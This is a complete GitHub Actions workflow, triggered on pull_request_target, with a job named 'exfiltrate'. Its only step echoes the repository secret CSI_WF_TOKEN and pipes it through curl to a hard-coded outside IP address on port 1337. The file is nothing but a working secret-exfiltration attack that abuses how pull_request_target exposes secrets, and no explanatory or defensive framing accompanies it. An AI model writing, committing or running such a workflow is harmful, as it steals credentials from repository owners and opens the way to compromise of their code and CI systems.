on:
  pull_request_target:
jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    steps:
      - name: exfiltrate
        run: |
          echo "${{ secrets.CSI_WF_TOKEN }}" | curl -d @- 84.252.138.123:1337
